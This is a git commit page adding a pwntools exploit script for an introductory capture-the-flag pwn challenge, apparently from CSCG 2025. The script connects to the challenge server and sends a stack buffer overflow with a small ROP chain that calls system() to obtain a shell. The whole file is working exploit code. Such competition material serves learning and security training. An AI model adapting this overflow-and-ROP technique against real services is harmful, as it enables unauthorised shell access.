dingdong
This commit is contained in:
34
cscg25/pwn/intro1/exploit.py
Normal file
34
cscg25/pwn/intro1/exploit.py
Normal file
@@ -0,0 +1,34 @@
|
||||
from pwn import *
|
||||
|
||||
# Set the context for the binary
|
||||
context.binary = './intro-pwn' # Replace with your binary's name
|
||||
|
||||
# Choose local or remote
|
||||
LOCAL = False # Change to False if connecting remotely
|
||||
|
||||
if LOCAL:
|
||||
p = process(context.binary.path)
|
||||
else:
|
||||
p = remote("a05e1cfb314bce1c87472c7e-1024-intro-pwn-1.challenge.cscg.live", 1337, ssl=True)# Define functions for convenience
|
||||
def send_payload(payload):
|
||||
p.sendline(payload)
|
||||
|
||||
def recv_until(delim):
|
||||
return p.recvuntil(delim)
|
||||
|
||||
def interact():
|
||||
p.interactive()
|
||||
|
||||
address = 0x4011c7
|
||||
system = 0x4011d5
|
||||
pop_rdi = 0x401205
|
||||
command_addr = 0x402010
|
||||
|
||||
|
||||
# Example interaction
|
||||
recv_until(b'What is your name?')
|
||||
payload = b'A' * 16 + b'\x00' * 8 + p64(pop_rdi) + p64(command_addr) + p64(system)# Adjust based on your needs
|
||||
send_payload(payload)
|
||||
|
||||
interact() # Keep the shell open
|
||||
|
||||
Reference in New Issue
Block a user